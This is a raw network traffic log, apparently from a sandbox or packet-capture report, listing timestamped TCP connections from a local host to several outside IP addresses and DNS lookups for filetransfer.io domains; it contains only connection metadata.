                                                                Nov 21, 2024 13:08:11.566199064 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.566243887 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.566278934 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.566287041 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.566298962 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.566325903 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.573271036 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.573314905 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.573340893 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.573348999 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.573369026 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.573394060 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.581134081 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.581173897 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.581201077 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.581212044 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.581233025 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.581258059 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.738414049 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.738462925 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.738562107 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.738585949 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.738614082 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.738636017 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.746231079 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.746279001 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.746310949 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.746320009 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.746340036 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.746360064 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.753215075 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.753282070 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.753292084 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.753312111 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.753336906 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.753359079 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.761194944 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.761240005 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.761267900 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.761276007 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.761298895 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.761326075 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.769011974 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.769054890 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.769157887 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.769190073 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.769220114 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.769227028 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.776597977 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.776643038 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.776678085 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.776685953 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.776702881 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.776724100 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.784501076 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.784550905 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.784583092 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.784589052 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.784611940 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.784630060 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.791460037 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.791502953 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.791532040 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.791538000 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.791558981 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.791579962 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.949615002 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.949667931 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.949695110 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.949706078 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.949731112 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.949748993 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.955950022 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.956005096 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.956026077 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.956033945 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.956052065 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.956068039 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.963980913 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.964040995 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.964059114 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.964067936 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.964091063 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.964107990 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.972130060 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.972182035 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.972203970 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.972213030 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.972233057 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.972256899 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.980717897 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.980770111 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.980789900 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.980798960 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.980823994 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.980834961 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.987668037 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.987715006 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.987735033 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.987742901 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.987756014 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.987776041 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.994293928 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.994345903 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.994364977 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.994379044 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:11.994394064 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:11.994412899 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:12.002463102 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:12.002507925 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:12.002541065 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:12.002547979 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:12.002573013 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:12.002595901 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:12.159780025 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:12.159836054 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:12.159878969 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:12.159895897 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:12.159939051 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:12.166789055 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:12.166836023 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:12.166866064 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:12.166872978 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:12.166883945 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:12.166912079 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:12.174563885 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:12.174607992 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:12.174640894 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:12.174652100 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:12.174665928 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:12.174691916 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:12.182693005 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:12.182746887 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:12.182780027 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:12.182792902 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:12.182812929 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:12.182831049 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:12.189979076 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:12.190043926 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:12.190057039 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:12.190064907 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:12.190102100 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:12.198080063 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:12.198126078 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:12.198153019 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:12.198159933 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:12.198196888 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:12.200021029 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:12.201582909 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:12.201680899 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:12.201687098 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:12.201751947 CET44349706188.114.96.3192.168.2.5
                                                                Nov 21, 2024 13:08:12.201800108 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:12.202265024 CET49706443192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:56.999710083 CET4980680192.168.2.5193.122.130.0
                                                                Nov 21, 2024 13:08:57.119195938 CET8049806193.122.130.0192.168.2.5
                                                                Nov 21, 2024 13:08:57.119328976 CET4980680192.168.2.5193.122.130.0
                                                                Nov 21, 2024 13:08:57.119740009 CET4980680192.168.2.5193.122.130.0
                                                                Nov 21, 2024 13:08:57.239392042 CET8049806193.122.130.0192.168.2.5
                                                                Nov 21, 2024 13:08:58.201302052 CET4970480192.168.2.5188.114.96.3
                                                                Nov 21, 2024 13:08:58.261223078 CET8049806193.122.130.0192.168.2.5
                                                                Nov 21, 2024 13:08:58.266613007 CET4980680192.168.2.5193.122.130.0
                                                                Nov 21, 2024 13:08:58.386127949 CET8049806193.122.130.0192.168.2.5
                                                                Nov 21, 2024 13:08:58.595220089 CET8049806193.122.130.0192.168.2.5
                                                                Nov 21, 2024 13:08:58.651241064 CET4980680192.168.2.5193.122.130.0
                                                                Nov 21, 2024 13:08:58.860022068 CET49811443192.168.2.5188.114.97.3
                                                                Nov 21, 2024 13:08:58.860059023 CET44349811188.114.97.3192.168.2.5
                                                                Nov 21, 2024 13:08:58.860157967 CET49811443192.168.2.5188.114.97.3
                                                                Nov 21, 2024 13:08:58.865015030 CET49811443192.168.2.5188.114.97.3
                                                                Nov 21, 2024 13:08:58.865039110 CET44349811188.114.97.3192.168.2.5
                                                                Nov 21, 2024 13:09:00.125906944 CET44349811188.114.97.3192.168.2.5
                                                                Nov 21, 2024 13:09:00.126038074 CET49811443192.168.2.5188.114.97.3
                                                                Nov 21, 2024 13:09:00.129221916 CET49811443192.168.2.5188.114.97.3
                                                                Nov 21, 2024 13:09:00.129229069 CET44349811188.114.97.3192.168.2.5
                                                                Nov 21, 2024 13:09:00.129499912 CET44349811188.114.97.3192.168.2.5
                                                                Nov 21, 2024 13:09:00.182514906 CET49811443192.168.2.5188.114.97.3
                                                                Nov 21, 2024 13:09:00.198393106 CET49811443192.168.2.5188.114.97.3
                                                                Nov 21, 2024 13:09:00.243323088 CET44349811188.114.97.3192.168.2.5
                                                                Nov 21, 2024 13:09:00.581233978 CET44349811188.114.97.3192.168.2.5
                                                                Nov 21, 2024 13:09:00.581398964 CET44349811188.114.97.3192.168.2.5
                                                                Nov 21, 2024 13:09:00.581885099 CET49811443192.168.2.5188.114.97.3
                                                                Nov 21, 2024 13:09:00.590812922 CET49811443192.168.2.5188.114.97.3
                                                                Nov 21, 2024 13:09:00.595020056 CET4980680192.168.2.5193.122.130.0
                                                                Nov 21, 2024 13:09:00.714494944 CET8049806193.122.130.0192.168.2.5
                                                                Nov 21, 2024 13:09:02.048403025 CET8049806193.122.130.0192.168.2.5
                                                                Nov 21, 2024 13:09:02.054436922 CET49822443192.168.2.5188.114.97.3
                                                                Nov 21, 2024 13:09:02.054466963 CET44349822188.114.97.3192.168.2.5
                                                                Nov 21, 2024 13:09:02.054531097 CET49822443192.168.2.5188.114.97.3
                                                                Nov 21, 2024 13:09:02.054778099 CET49822443192.168.2.5188.114.97.3
                                                                Nov 21, 2024 13:09:02.054791927 CET44349822188.114.97.3192.168.2.5
                                                                Nov 21, 2024 13:09:02.088850021 CET4980680192.168.2.5193.122.130.0
                                                                Nov 21, 2024 13:09:03.265458107 CET44349822188.114.97.3192.168.2.5
                                                                Nov 21, 2024 13:09:03.267726898 CET49822443192.168.2.5188.114.97.3
                                                                Nov 21, 2024 13:09:03.267745018 CET44349822188.114.97.3192.168.2.5
                                                                Nov 21, 2024 13:09:03.727442026 CET44349822188.114.97.3192.168.2.5
                                                                Nov 21, 2024 13:09:03.727487087 CET44349822188.114.97.3192.168.2.5
                                                                Nov 21, 2024 13:09:03.727561951 CET49822443192.168.2.5188.114.97.3
                                                                Nov 21, 2024 13:09:03.728172064 CET49822443192.168.2.5188.114.97.3
                                                                Nov 21, 2024 13:09:03.744874954 CET4980680192.168.2.5193.122.130.0
                                                                Nov 21, 2024 13:09:03.773952007 CET4982580192.168.2.5193.122.130.0
                                                                Nov 21, 2024 13:09:03.864758968 CET8049806193.122.130.0192.168.2.5
                                                                Nov 21, 2024 13:09:03.864833117 CET4980680192.168.2.5193.122.130.0
                                                                Nov 21, 2024 13:09:03.894368887 CET8049825193.122.130.0192.168.2.5
                                                                Nov 21, 2024 13:09:03.894454002 CET4982580192.168.2.5193.122.130.0
                                                                Nov 21, 2024 13:09:03.894653082 CET4982580192.168.2.5193.122.130.0
                                                                Nov 21, 2024 13:09:04.017121077 CET8049825193.122.130.0192.168.2.5
                                                                Nov 21, 2024 13:09:05.040397882 CET8049825193.122.130.0192.168.2.5
                                                                Nov 21, 2024 13:09:05.041815996 CET49829443192.168.2.5188.114.97.3
                                                                Nov 21, 2024 13:09:05.041850090 CET44349829188.114.97.3192.168.2.5
                                                                Nov 21, 2024 13:09:05.041929007 CET49829443192.168.2.5188.114.97.3
                                                                Nov 21, 2024 13:09:05.042272091 CET49829443192.168.2.5188.114.97.3
                                                                Nov 21, 2024 13:09:05.042287111 CET44349829188.114.97.3192.168.2.5
                                                                Nov 21, 2024 13:09:05.088823080 CET4982580192.168.2.5193.122.130.0
                                                                Nov 21, 2024 13:09:06.297967911 CET44349829188.114.97.3192.168.2.5
                                                                Nov 21, 2024 13:09:06.299576044 CET49829443192.168.2.5188.114.97.3
                                                                Nov 21, 2024 13:09:06.299595118 CET44349829188.114.97.3192.168.2.5
                                                                Nov 21, 2024 13:09:06.755471945 CET44349829188.114.97.3192.168.2.5
                                                                Nov 21, 2024 13:09:06.755542994 CET44349829188.114.97.3192.168.2.5
                                                                Nov 21, 2024 13:09:06.755717993 CET49829443192.168.2.5188.114.97.3
                                                                Nov 21, 2024 13:09:06.756386995 CET49829443192.168.2.5188.114.97.3
                                                                Nov 21, 2024 13:09:06.761121035 CET4983580192.168.2.5193.122.130.0
                                                                Nov 21, 2024 13:09:06.880889893 CET8049835193.122.130.0192.168.2.5
                                                                Nov 21, 2024 13:09:06.881016970 CET4983580192.168.2.5193.122.130.0
                                                                Nov 21, 2024 13:09:06.881289959 CET4983580192.168.2.5193.122.130.0
                                                                Nov 21, 2024 13:09:07.000760078 CET8049835193.122.130.0192.168.2.5
                                                                Nov 21, 2024 13:09:07.977415085 CET8049835193.122.130.0192.168.2.5
                                                                Nov 21, 2024 13:09:07.979072094 CET49836443192.168.2.5188.114.97.3
                                                                Nov 21, 2024 13:09:07.979091883 CET44349836188.114.97.3192.168.2.5
                                                                Nov 21, 2024 13:09:07.979279041 CET49836443192.168.2.5188.114.97.3
                                                                Nov 21, 2024 13:09:07.979628086 CET49836443192.168.2.5188.114.97.3
                                                                Nov 21, 2024 13:09:07.979640007 CET44349836188.114.97.3192.168.2.5
                                                                Nov 21, 2024 13:09:08.026369095 CET4983580192.168.2.5193.122.130.0
                                                                Nov 21, 2024 13:09:09.288507938 CET44349836188.114.97.3192.168.2.5
                                                                Nov 21, 2024 13:09:09.295325041 CET49836443192.168.2.5188.114.97.3
                                                                Nov 21, 2024 13:09:09.295345068 CET44349836188.114.97.3192.168.2.5
                                                                Nov 21, 2024 13:09:09.760966063 CET44349836188.114.97.3192.168.2.5
                                                                Nov 21, 2024 13:09:09.761015892 CET44349836188.114.97.3192.168.2.5
                                                                Nov 21, 2024 13:09:09.761112928 CET49836443192.168.2.5188.114.97.3
                                                                Nov 21, 2024 13:09:09.761734962 CET49836443192.168.2.5188.114.97.3
                                                                Nov 21, 2024 13:09:09.765573025 CET4983580192.168.2.5193.122.130.0
                                                                Nov 21, 2024 13:09:09.766779900 CET4984280192.168.2.5193.122.130.0
                                                                Nov 21, 2024 13:09:09.885690928 CET8049835193.122.130.0192.168.2.5
                                                                Nov 21, 2024 13:09:09.885762930 CET4983580192.168.2.5193.122.130.0
                                                                Nov 21, 2024 13:09:09.886785984 CET8049842193.122.130.0192.168.2.5
                                                                Nov 21, 2024 13:09:09.886857986 CET4984280192.168.2.5193.122.130.0
                                                                Nov 21, 2024 13:09:09.887140036 CET4984280192.168.2.5193.122.130.0
                                                                Nov 21, 2024 13:09:10.006736040 CET8049842193.122.130.0192.168.2.5
                                                                Nov 21, 2024 13:09:10.984077930 CET8049842193.122.130.0192.168.2.5
                                                                Nov 21, 2024 13:09:10.987660885 CET49846443192.168.2.5188.114.97.3
                                                                Nov 21, 2024 13:09:10.987713099 CET44349846188.114.97.3192.168.2.5
                                                                Nov 21, 2024 13:09:10.987793922 CET49846443192.168.2.5188.114.97.3
                                                                Nov 21, 2024 13:09:10.988198996 CET49846443192.168.2.5188.114.97.3
                                                                Nov 21, 2024 13:09:10.988219976 CET44349846188.114.97.3192.168.2.5
                                                                Nov 21, 2024 13:09:11.041862011 CET4984280192.168.2.5193.122.130.0
                                                                Nov 21, 2024 13:09:12.243922949 CET44349846188.114.97.3192.168.2.5
                                                                Nov 21, 2024 13:09:12.245517015 CET49846443192.168.2.5188.114.97.3
                                                                Nov 21, 2024 13:09:12.245619059 CET44349846188.114.97.3192.168.2.5
                                                                Nov 21, 2024 13:09:12.704588890 CET44349846188.114.97.3192.168.2.5
                                                                Nov 21, 2024 13:09:12.705487013 CET44349846188.114.97.3192.168.2.5
                                                                Nov 21, 2024 13:09:12.705595970 CET49846443192.168.2.5188.114.97.3
                                                                Nov 21, 2024 13:09:12.705910921 CET49846443192.168.2.5188.114.97.3
                                                                Nov 21, 2024 13:09:12.710544109 CET4984280192.168.2.5193.122.130.0
                                                                Nov 21, 2024 13:09:12.711057901 CET4985080192.168.2.5193.122.130.0
                                                                Nov 21, 2024 13:09:12.830887079 CET8049850193.122.130.0192.168.2.5
                                                                Nov 21, 2024 13:09:12.831038952 CET4985080192.168.2.5193.122.130.0
                                                                Nov 21, 2024 13:09:12.831213951 CET4985080192.168.2.5193.122.130.0
                                                                Nov 21, 2024 13:09:12.831430912 CET8049842193.122.130.0192.168.2.5
                                                                Nov 21, 2024 13:09:12.831511974 CET4984280192.168.2.5193.122.130.0
                                                                Nov 21, 2024 13:09:12.950998068 CET8049850193.122.130.0192.168.2.5
                                                                Nov 21, 2024 13:09:13.972841024 CET8049850193.122.130.0192.168.2.5
                                                                Nov 21, 2024 13:09:13.974889040 CET49855443192.168.2.5188.114.97.3
                                                                Nov 21, 2024 13:09:13.974936962 CET44349855188.114.97.3192.168.2.5
                                                                Nov 21, 2024 13:09:13.975039959 CET49855443192.168.2.5188.114.97.3
                                                                Nov 21, 2024 13:09:13.975404024 CET49855443192.168.2.5188.114.97.3
                                                                Nov 21, 2024 13:09:13.975429058 CET44349855188.114.97.3192.168.2.5
                                                                Nov 21, 2024 13:09:14.026287079 CET4985080192.168.2.5193.122.130.0
                                                                Nov 21, 2024 13:09:15.188596010 CET44349855188.114.97.3192.168.2.5
                                                                Nov 21, 2024 13:09:15.190309048 CET49855443192.168.2.5188.114.97.3
                                                                Nov 21, 2024 13:09:15.190391064 CET44349855188.114.97.3192.168.2.5
                                                                Nov 21, 2024 13:09:15.636693954 CET44349855188.114.97.3192.168.2.5
                                                                Nov 21, 2024 13:09:15.636763096 CET44349855188.114.97.3192.168.2.5
                                                                Nov 21, 2024 13:09:15.636832952 CET49855443192.168.2.5188.114.97.3
                                                                Nov 21, 2024 13:09:15.637535095 CET49855443192.168.2.5188.114.97.3
                                                                Nov 21, 2024 13:09:15.642062902 CET4985080192.168.2.5193.122.130.0
                                                                Nov 21, 2024 13:09:15.643172026 CET4986080192.168.2.5193.122.130.0
                                                                Nov 21, 2024 13:09:15.762653112 CET8049850193.122.130.0192.168.2.5
                                                                Nov 21, 2024 13:09:15.762748003 CET8049860193.122.130.0192.168.2.5
                                                                Nov 21, 2024 13:09:15.762805939 CET4985080192.168.2.5193.122.130.0
                                                                Nov 21, 2024 13:09:15.762856007 CET4986080192.168.2.5193.122.130.0
                                                                Nov 21, 2024 13:09:15.763046026 CET4986080192.168.2.5193.122.130.0
                                                                Nov 21, 2024 13:09:15.882487059 CET8049860193.122.130.0192.168.2.5
                                                                Nov 21, 2024 13:09:16.899889946 CET8049860193.122.130.0192.168.2.5
                                                                Nov 21, 2024 13:09:16.901448011 CET49862443192.168.2.5188.114.97.3
                                                                Nov 21, 2024 13:09:16.901540041 CET44349862188.114.97.3192.168.2.5
                                                                Nov 21, 2024 13:09:16.901624918 CET49862443192.168.2.5188.114.97.3
                                                                Nov 21, 2024 13:09:16.901868105 CET49862443192.168.2.5188.114.97.3
                                                                Nov 21, 2024 13:09:16.901905060 CET44349862188.114.97.3192.168.2.5
                                                                Nov 21, 2024 13:09:16.948116064 CET4986080192.168.2.5193.122.130.0
                                                                Nov 21, 2024 13:09:18.210544109 CET44349862188.114.97.3192.168.2.5
                                                                Nov 21, 2024 13:09:18.212028027 CET49862443192.168.2.5188.114.97.3
                                                                Nov 21, 2024 13:09:18.212074995 CET44349862188.114.97.3192.168.2.5
                                                                Nov 21, 2024 13:09:18.683924913 CET44349862188.114.97.3192.168.2.5
                                                                Nov 21, 2024 13:09:18.683979988 CET44349862188.114.97.3192.168.2.5
                                                                Nov 21, 2024 13:09:18.684092045 CET49862443192.168.2.5188.114.97.3
                                                                Nov 21, 2024 13:09:18.684647083 CET49862443192.168.2.5188.114.97.3
                                                                Nov 21, 2024 13:09:18.688395023 CET4986080192.168.2.5193.122.130.0
                                                                Nov 21, 2024 13:09:18.689444065 CET4986880192.168.2.5193.122.130.0
                                                                Nov 21, 2024 13:09:18.811160088 CET8049868193.122.130.0192.168.2.5
                                                                Nov 21, 2024 13:09:18.811363935 CET4986880192.168.2.5193.122.130.0
                                                                Nov 21, 2024 13:09:18.811547041 CET4986880192.168.2.5193.122.130.0
                                                                Nov 21, 2024 13:09:18.813613892 CET8049860193.122.130.0192.168.2.5
                                                                Nov 21, 2024 13:09:18.813695908 CET4986080192.168.2.5193.122.130.0
                                                                Nov 21, 2024 13:09:18.931056976 CET8049868193.122.130.0192.168.2.5
                                                                Nov 21, 2024 13:09:19.974071980 CET8049868193.122.130.0192.168.2.5
                                                                Nov 21, 2024 13:09:19.975653887 CET49872443192.168.2.5188.114.97.3
                                                                Nov 21, 2024 13:09:19.975734949 CET44349872188.114.97.3192.168.2.5
                                                                Nov 21, 2024 13:09:19.975815058 CET49872443192.168.2.5188.114.97.3
                                                                Nov 21, 2024 13:09:19.976115942 CET49872443192.168.2.5188.114.97.3
                                                                Nov 21, 2024 13:09:19.976151943 CET44349872188.114.97.3192.168.2.5
                                                                Nov 21, 2024 13:09:20.026278973 CET4986880192.168.2.5193.122.130.0
                                                                Nov 21, 2024 13:09:21.237103939 CET44349872188.114.97.3192.168.2.5
                                                                Nov 21, 2024 13:09:21.238950014 CET49872443192.168.2.5188.114.97.3
                                                                Nov 21, 2024 13:09:21.238981009 CET44349872188.114.97.3192.168.2.5
                                                                Nov 21, 2024 13:09:21.696135998 CET44349872188.114.97.3192.168.2.5
                                                                Nov 21, 2024 13:09:21.696230888 CET44349872188.114.97.3192.168.2.5
                                                                Nov 21, 2024 13:09:21.696352959 CET49872443192.168.2.5188.114.97.3
                                                                Nov 21, 2024 13:09:21.696943998 CET49872443192.168.2.5188.114.97.3
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Nov 21, 2024 13:07:59.368355989 CET5225853192.168.2.51.1.1.1
                                                                Nov 21, 2024 13:07:59.601717949 CET53522581.1.1.1192.168.2.5
                                                                Nov 21, 2024 13:08:03.286274910 CET5657053192.168.2.51.1.1.1
                                                                Nov 21, 2024 13:08:03.522113085 CET53565701.1.1.1192.168.2.5
                                                                Nov 21, 2024 13:08:56.703119040 CET6113253192.168.2.51.1.1.1
                                                                Nov 21, 2024 13:08:56.990396976 CET53611321.1.1.1192.168.2.5
                                                                Nov 21, 2024 13:08:58.622854948 CET5701253192.168.2.51.1.1.1
                                                                Nov 21, 2024 13:08:58.856762886 CET53570121.1.1.1192.168.2.5
                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Nov 21, 2024 13:07:59.368355989 CET192.168.2.51.1.1.10x91cdStandard query (0)filetransfer.ioA (IP address)IN (0x0001)false
                                                                Nov 21, 2024 13:08:03.286274910 CET192.168.2.51.1.1.10x1a64Standard query (0)s24.filetransfer.ioA (IP address)IN (0x0001)false
